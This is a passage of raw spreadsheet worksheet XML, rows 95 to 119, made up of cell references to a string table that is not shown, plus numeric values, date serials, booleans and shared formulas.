        <v>507</v>
      </c>
      <c r="K95" s="2" t="s">
        <v>508</v>
      </c>
      <c r="L95" s="1">
        <v>3.0</v>
      </c>
      <c r="M95" s="1">
        <v>8.0</v>
      </c>
      <c r="N95" s="1" t="s">
        <v>149</v>
      </c>
      <c r="O95" s="1" t="s">
        <v>509</v>
      </c>
      <c r="P95" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q95" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R95" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S95" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="1">
        <v>880.0</v>
      </c>
      <c r="B96" s="2" t="s">
        <v>519</v>
      </c>
      <c r="C96" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D96" s="2" t="s">
        <v>520</v>
      </c>
      <c r="E96" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F96" s="1" t="s">
        <v>521</v>
      </c>
      <c r="G96" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H96" s="1" t="s">
        <v>522</v>
      </c>
      <c r="I96" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J96" s="1" t="s">
        <v>523</v>
      </c>
      <c r="K96" s="2" t="s">
        <v>524</v>
      </c>
      <c r="L96" s="1">
        <v>3.0</v>
      </c>
      <c r="M96" s="1">
        <v>4.0</v>
      </c>
      <c r="N96" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O96" s="1" t="s">
        <v>525</v>
      </c>
      <c r="P96" s="1" t="s">
        <v>526</v>
      </c>
      <c r="Q96" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R96" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S96" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="1">
        <v>881.0</v>
      </c>
      <c r="B97" s="2" t="s">
        <v>527</v>
      </c>
      <c r="C97" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D97" s="2" t="s">
        <v>528</v>
      </c>
      <c r="E97" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F97" s="1" t="s">
        <v>529</v>
      </c>
      <c r="G97" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H97" s="4">
        <v>44805.06736111111</v>
      </c>
      <c r="I97" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J97" s="1" t="s">
        <v>523</v>
      </c>
      <c r="K97" s="2" t="s">
        <v>524</v>
      </c>
      <c r="L97" s="1">
        <v>3.0</v>
      </c>
      <c r="M97" s="1">
        <v>4.0</v>
      </c>
      <c r="N97" s="1" t="s">
        <v>530</v>
      </c>
      <c r="O97" s="1" t="s">
        <v>525</v>
      </c>
      <c r="P97" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q97" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R97" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S97" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="1">
        <v>882.0</v>
      </c>
      <c r="B98" s="2" t="s">
        <v>531</v>
      </c>
      <c r="C98" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D98" s="2" t="s">
        <v>532</v>
      </c>
      <c r="E98" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F98" s="1" t="s">
        <v>521</v>
      </c>
      <c r="G98" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H98" s="4">
        <v>44866.763194444444</v>
      </c>
      <c r="I98" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J98" s="1" t="s">
        <v>523</v>
      </c>
      <c r="K98" s="2" t="s">
        <v>524</v>
      </c>
      <c r="L98" s="1">
        <v>3.0</v>
      </c>
      <c r="M98" s="1">
        <v>4.0</v>
      </c>
      <c r="N98" s="1" t="s">
        <v>533</v>
      </c>
      <c r="O98" s="1" t="s">
        <v>525</v>
      </c>
      <c r="P98" s="1" t="s">
        <v>39</v>
      </c>
      <c r="Q98" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R98" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S98" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="1">
        <v>884.0</v>
      </c>
      <c r="B99" s="2" t="s">
        <v>534</v>
      </c>
      <c r="C99" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D99" s="2" t="s">
        <v>535</v>
      </c>
      <c r="E99" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F99" s="1" t="s">
        <v>536</v>
      </c>
      <c r="G99" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H99" s="1" t="s">
        <v>537</v>
      </c>
      <c r="I99" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J99" s="1" t="s">
        <v>538</v>
      </c>
      <c r="K99" s="2" t="s">
        <v>539</v>
      </c>
      <c r="L99" s="1">
        <v>2.0</v>
      </c>
      <c r="M99" s="1">
        <v>2.0</v>
      </c>
      <c r="N99" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O99" s="1" t="s">
        <v>540</v>
      </c>
      <c r="P99" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q99" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R99" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S99" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="1">
        <v>886.0</v>
      </c>
      <c r="B100" s="2" t="s">
        <v>541</v>
      </c>
      <c r="C100" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D100" s="2" t="s">
        <v>542</v>
      </c>
      <c r="E100" s="2" t="s">
        <v>135</v>
      </c>
      <c r="F100" s="1" t="s">
        <v>543</v>
      </c>
      <c r="G100" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H100" s="1" t="s">
        <v>544</v>
      </c>
      <c r="I100" s="1" t="s">
        <v>545</v>
      </c>
      <c r="J100" s="1" t="s">
        <v>546</v>
      </c>
      <c r="K100" s="2" t="s">
        <v>547</v>
      </c>
      <c r="L100" s="1">
        <v>4.0</v>
      </c>
      <c r="M100" s="1">
        <v>6.0</v>
      </c>
      <c r="N100" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O100" s="1" t="s">
        <v>548</v>
      </c>
      <c r="P100" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q100" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R100" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S100" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="1">
        <v>887.0</v>
      </c>
      <c r="B101" s="2" t="s">
        <v>549</v>
      </c>
      <c r="C101" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D101" s="2" t="s">
        <v>550</v>
      </c>
      <c r="E101" s="2" t="s">
        <v>124</v>
      </c>
      <c r="F101" s="1" t="s">
        <v>551</v>
      </c>
      <c r="G101" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H101" s="1" t="s">
        <v>552</v>
      </c>
      <c r="I101" s="1" t="s">
        <v>545</v>
      </c>
      <c r="J101" s="1" t="s">
        <v>546</v>
      </c>
      <c r="K101" s="2" t="s">
        <v>547</v>
      </c>
      <c r="L101" s="1">
        <v>4.0</v>
      </c>
      <c r="M101" s="1">
        <v>6.0</v>
      </c>
      <c r="N101" s="1" t="s">
        <v>553</v>
      </c>
      <c r="O101" s="1" t="s">
        <v>548</v>
      </c>
      <c r="P101" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q101" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R101" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S101" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="1">
        <v>1074.0</v>
      </c>
      <c r="B102" s="2" t="s">
        <v>554</v>
      </c>
      <c r="C102" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D102" s="2" t="s">
        <v>555</v>
      </c>
      <c r="E102" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F102" s="1" t="s">
        <v>556</v>
      </c>
      <c r="G102" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H102" s="1" t="s">
        <v>557</v>
      </c>
      <c r="I102" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J102" s="1" t="s">
        <v>558</v>
      </c>
      <c r="K102" s="2" t="s">
        <v>559</v>
      </c>
      <c r="L102" s="1">
        <v>14.0</v>
      </c>
      <c r="M102" s="1">
        <v>14.0</v>
      </c>
      <c r="N102" s="1" t="s">
        <v>78</v>
      </c>
      <c r="O102" s="1" t="s">
        <v>560</v>
      </c>
      <c r="P102" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q102" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R102" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S102" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="1">
        <v>1077.0</v>
      </c>
      <c r="B103" s="2" t="s">
        <v>561</v>
      </c>
      <c r="C103" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D103" s="2" t="s">
        <v>562</v>
      </c>
      <c r="E103" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F103" s="1" t="s">
        <v>258</v>
      </c>
      <c r="G103" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H103" s="1" t="s">
        <v>563</v>
      </c>
      <c r="I103" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J103" s="1" t="s">
        <v>558</v>
      </c>
      <c r="K103" s="2" t="s">
        <v>559</v>
      </c>
      <c r="L103" s="1">
        <v>14.0</v>
      </c>
      <c r="M103" s="1">
        <v>14.0</v>
      </c>
      <c r="N103" s="1" t="s">
        <v>564</v>
      </c>
      <c r="O103" s="1" t="s">
        <v>560</v>
      </c>
      <c r="P103" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q103" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R103" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S103" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="1">
        <v>1078.0</v>
      </c>
      <c r="B104" s="2" t="s">
        <v>565</v>
      </c>
      <c r="C104" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D104" s="6" t="s">
        <v>555</v>
      </c>
      <c r="E104" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F104" s="1" t="s">
        <v>566</v>
      </c>
      <c r="G104" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H104" s="1" t="s">
        <v>567</v>
      </c>
      <c r="I104" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J104" s="1" t="s">
        <v>558</v>
      </c>
      <c r="K104" s="2" t="s">
        <v>559</v>
      </c>
      <c r="L104" s="1">
        <v>14.0</v>
      </c>
      <c r="M104" s="1">
        <v>14.0</v>
      </c>
      <c r="N104" s="1" t="s">
        <v>568</v>
      </c>
      <c r="O104" s="1" t="s">
        <v>560</v>
      </c>
      <c r="P104" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q104" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R104" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S104" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="1">
        <v>1084.0</v>
      </c>
      <c r="B105" s="2" t="s">
        <v>569</v>
      </c>
      <c r="C105" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D105" s="2" t="s">
        <v>570</v>
      </c>
      <c r="E105" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F105" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G105" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H105" s="4">
        <v>44353.688888888886</v>
      </c>
      <c r="I105" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J105" s="1" t="s">
        <v>571</v>
      </c>
      <c r="K105" s="2" t="s">
        <v>572</v>
      </c>
      <c r="L105" s="1">
        <v>1.0</v>
      </c>
      <c r="M105" s="1">
        <v>1.0</v>
      </c>
      <c r="N105" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O105" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P105" s="1" t="s">
        <v>573</v>
      </c>
      <c r="Q105" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R105" s="2">
        <f t="shared" si="2"/>
        <v>7</v>
      </c>
      <c r="S105" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="1">
        <v>1093.0</v>
      </c>
      <c r="B106" s="2" t="s">
        <v>574</v>
      </c>
      <c r="C106" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D106" s="2" t="s">
        <v>575</v>
      </c>
      <c r="E106" s="2" t="s">
        <v>576</v>
      </c>
      <c r="F106" s="1" t="s">
        <v>577</v>
      </c>
      <c r="G106" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H106" s="1" t="s">
        <v>578</v>
      </c>
      <c r="I106" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J106" s="1" t="s">
        <v>579</v>
      </c>
      <c r="K106" s="2" t="s">
        <v>580</v>
      </c>
      <c r="L106" s="1">
        <v>1.0</v>
      </c>
      <c r="M106" s="1">
        <v>1.0</v>
      </c>
      <c r="N106" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O106" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P106" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q106" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R106" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S106" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="1">
        <v>1094.0</v>
      </c>
      <c r="B107" s="2" t="s">
        <v>574</v>
      </c>
      <c r="C107" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D107" s="2" t="s">
        <v>575</v>
      </c>
      <c r="E107" s="2" t="s">
        <v>576</v>
      </c>
      <c r="F107" s="1" t="s">
        <v>577</v>
      </c>
      <c r="G107" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H107" s="1" t="s">
        <v>581</v>
      </c>
      <c r="I107" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J107" s="1" t="s">
        <v>582</v>
      </c>
      <c r="K107" s="2" t="s">
        <v>580</v>
      </c>
      <c r="L107" s="1">
        <v>5.0</v>
      </c>
      <c r="M107" s="1">
        <v>6.0</v>
      </c>
      <c r="N107" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O107" s="1" t="s">
        <v>583</v>
      </c>
      <c r="P107" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q107" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R107" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S107" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="1">
        <v>1095.0</v>
      </c>
      <c r="B108" s="2" t="s">
        <v>584</v>
      </c>
      <c r="C108" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D108" s="2" t="s">
        <v>585</v>
      </c>
      <c r="E108" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F108" s="1" t="s">
        <v>586</v>
      </c>
      <c r="G108" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H108" s="1" t="s">
        <v>587</v>
      </c>
      <c r="I108" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J108" s="1" t="s">
        <v>582</v>
      </c>
      <c r="K108" s="2" t="s">
        <v>580</v>
      </c>
      <c r="L108" s="1">
        <v>5.0</v>
      </c>
      <c r="M108" s="1">
        <v>6.0</v>
      </c>
      <c r="N108" s="1" t="s">
        <v>487</v>
      </c>
      <c r="O108" s="1" t="s">
        <v>583</v>
      </c>
      <c r="P108" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q108" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R108" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S108" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="1">
        <v>1096.0</v>
      </c>
      <c r="B109" s="2" t="s">
        <v>588</v>
      </c>
      <c r="C109" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D109" s="2" t="s">
        <v>585</v>
      </c>
      <c r="E109" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F109" s="1" t="s">
        <v>420</v>
      </c>
      <c r="G109" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H109" s="1" t="s">
        <v>589</v>
      </c>
      <c r="I109" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J109" s="1" t="s">
        <v>582</v>
      </c>
      <c r="K109" s="2" t="s">
        <v>580</v>
      </c>
      <c r="L109" s="1">
        <v>5.0</v>
      </c>
      <c r="M109" s="1">
        <v>6.0</v>
      </c>
      <c r="N109" s="1" t="s">
        <v>590</v>
      </c>
      <c r="O109" s="1" t="s">
        <v>583</v>
      </c>
      <c r="P109" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q109" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R109" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S109" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="1">
        <v>1097.0</v>
      </c>
      <c r="B110" s="2" t="s">
        <v>591</v>
      </c>
      <c r="C110" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D110" s="2" t="s">
        <v>585</v>
      </c>
      <c r="E110" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F110" s="1" t="s">
        <v>592</v>
      </c>
      <c r="G110" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H110" s="1" t="s">
        <v>593</v>
      </c>
      <c r="I110" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J110" s="1" t="s">
        <v>582</v>
      </c>
      <c r="K110" s="2" t="s">
        <v>580</v>
      </c>
      <c r="L110" s="1">
        <v>5.0</v>
      </c>
      <c r="M110" s="1">
        <v>6.0</v>
      </c>
      <c r="N110" s="1" t="s">
        <v>594</v>
      </c>
      <c r="O110" s="1" t="s">
        <v>583</v>
      </c>
      <c r="P110" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q110" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R110" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S110" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="1">
        <v>1101.0</v>
      </c>
      <c r="B111" s="2" t="s">
        <v>595</v>
      </c>
      <c r="C111" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D111" s="2" t="s">
        <v>596</v>
      </c>
      <c r="E111" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F111" s="1" t="s">
        <v>597</v>
      </c>
      <c r="G111" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H111" s="1" t="s">
        <v>598</v>
      </c>
      <c r="I111" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J111" s="1" t="s">
        <v>599</v>
      </c>
      <c r="K111" s="2" t="s">
        <v>600</v>
      </c>
      <c r="L111" s="1">
        <v>2.0</v>
      </c>
      <c r="M111" s="1">
        <v>3.0</v>
      </c>
      <c r="N111" s="1" t="s">
        <v>104</v>
      </c>
      <c r="O111" s="1" t="s">
        <v>601</v>
      </c>
      <c r="P111" s="1" t="s">
        <v>602</v>
      </c>
      <c r="Q111" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R111" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S111" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="1">
        <v>1109.0</v>
      </c>
      <c r="B112" s="2" t="s">
        <v>603</v>
      </c>
      <c r="C112" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D112" s="2" t="s">
        <v>604</v>
      </c>
      <c r="E112" s="2" t="s">
        <v>605</v>
      </c>
      <c r="F112" s="1" t="s">
        <v>606</v>
      </c>
      <c r="G112" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H112" s="4">
        <v>44656.864583333336</v>
      </c>
      <c r="I112" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J112" s="1" t="s">
        <v>607</v>
      </c>
      <c r="K112" s="2" t="s">
        <v>608</v>
      </c>
      <c r="L112" s="1">
        <v>2.0</v>
      </c>
      <c r="M112" s="1">
        <v>2.0</v>
      </c>
      <c r="N112" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O112" s="1" t="s">
        <v>609</v>
      </c>
      <c r="P112" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q112" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R112" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S112" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="1">
        <v>1110.0</v>
      </c>
      <c r="B113" s="2" t="s">
        <v>610</v>
      </c>
      <c r="C113" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D113" s="2" t="s">
        <v>611</v>
      </c>
      <c r="E113" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F113" s="1" t="s">
        <v>218</v>
      </c>
      <c r="G113" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H113" s="1" t="s">
        <v>612</v>
      </c>
      <c r="I113" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J113" s="1" t="s">
        <v>607</v>
      </c>
      <c r="K113" s="2" t="s">
        <v>608</v>
      </c>
      <c r="L113" s="1">
        <v>2.0</v>
      </c>
      <c r="M113" s="1">
        <v>2.0</v>
      </c>
      <c r="N113" s="1" t="s">
        <v>609</v>
      </c>
      <c r="O113" s="1" t="s">
        <v>609</v>
      </c>
      <c r="P113" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q113" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R113" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S113" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="1">
        <v>1111.0</v>
      </c>
      <c r="B114" s="2" t="s">
        <v>613</v>
      </c>
      <c r="C114" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D114" s="2" t="s">
        <v>614</v>
      </c>
      <c r="E114" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F114" s="1" t="s">
        <v>615</v>
      </c>
      <c r="G114" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H114" s="4">
        <v>44652.42083333333</v>
      </c>
      <c r="I114" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J114" s="1" t="s">
        <v>616</v>
      </c>
      <c r="K114" s="2" t="s">
        <v>617</v>
      </c>
      <c r="L114" s="1">
        <v>4.0</v>
      </c>
      <c r="M114" s="1">
        <v>7.0</v>
      </c>
      <c r="N114" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O114" s="1" t="s">
        <v>618</v>
      </c>
      <c r="P114" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q114" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R114" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S114" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="1">
        <v>1128.0</v>
      </c>
      <c r="B115" s="2" t="s">
        <v>619</v>
      </c>
      <c r="C115" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D115" s="2" t="s">
        <v>620</v>
      </c>
      <c r="E115" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F115" s="1" t="s">
        <v>621</v>
      </c>
      <c r="G115" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H115" s="1" t="s">
        <v>622</v>
      </c>
      <c r="I115" s="1" t="s">
        <v>623</v>
      </c>
      <c r="J115" s="1" t="s">
        <v>624</v>
      </c>
      <c r="K115" s="2" t="s">
        <v>625</v>
      </c>
      <c r="L115" s="1">
        <v>1.0</v>
      </c>
      <c r="M115" s="1">
        <v>1.0</v>
      </c>
      <c r="N115" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O115" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P115" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q115" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R115" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S115" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="1">
        <v>1129.0</v>
      </c>
      <c r="B116" s="2" t="s">
        <v>626</v>
      </c>
      <c r="C116" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D116" s="2" t="s">
        <v>627</v>
      </c>
      <c r="E116" s="2" t="s">
        <v>628</v>
      </c>
      <c r="F116" s="1" t="s">
        <v>629</v>
      </c>
      <c r="G116" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H116" s="4">
        <v>44838.20277777778</v>
      </c>
      <c r="I116" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J116" s="1" t="s">
        <v>630</v>
      </c>
      <c r="K116" s="2" t="s">
        <v>631</v>
      </c>
      <c r="L116" s="1">
        <v>2.0</v>
      </c>
      <c r="M116" s="1">
        <v>5.0</v>
      </c>
      <c r="N116" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O116" s="1" t="s">
        <v>632</v>
      </c>
      <c r="P116" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q116" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R116" s="2">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="S116" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="1">
        <v>1156.0</v>
      </c>
      <c r="B117" s="2" t="s">
        <v>633</v>
      </c>
      <c r="C117" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D117" s="2" t="s">
        <v>634</v>
      </c>
      <c r="E117" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F117" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G117" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H117" s="1" t="s">
        <v>635</v>
      </c>
      <c r="I117" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J117" s="1" t="s">
        <v>636</v>
      </c>
      <c r="K117" s="2" t="s">
        <v>637</v>
      </c>
      <c r="L117" s="1">
        <v>1.0</v>
      </c>
      <c r="M117" s="1">
        <v>1.0</v>
      </c>
      <c r="N117" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O117" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P117" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q117" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R117" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S117" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="1">
        <v>1197.0</v>
      </c>
      <c r="B118" s="2" t="s">
        <v>638</v>
      </c>
      <c r="C118" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D118" s="2" t="s">
        <v>639</v>
      </c>
      <c r="E118" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F118" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G118" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H118" s="4">
        <v>44502.69305555556</v>
      </c>
      <c r="I118" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J118" s="1" t="s">
        <v>640</v>
      </c>
      <c r="K118" s="2" t="s">
        <v>641</v>
      </c>
      <c r="L118" s="1">
        <v>1.0</v>
      </c>
      <c r="M118" s="1">
        <v>1.0</v>
      </c>
      <c r="N118" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O118" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P118" s="1" t="s">
        <v>642</v>
      </c>
      <c r="Q118" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R118" s="2">
        <f t="shared" si="2"/>
        <v>8</v>
      </c>
      <c r="S118" s="1">
        <f t="shared" si="3"/>
        <v>8</v>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="1">
        <v>1199.0</v>
      </c>
      <c r="B119" s="2" t="s">
        <v>643</v>
      </c>
      <c r="C119" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D119" s="2" t="s">
        <v>644</v>
      </c>
      <c r="E119" s="2" t="s">
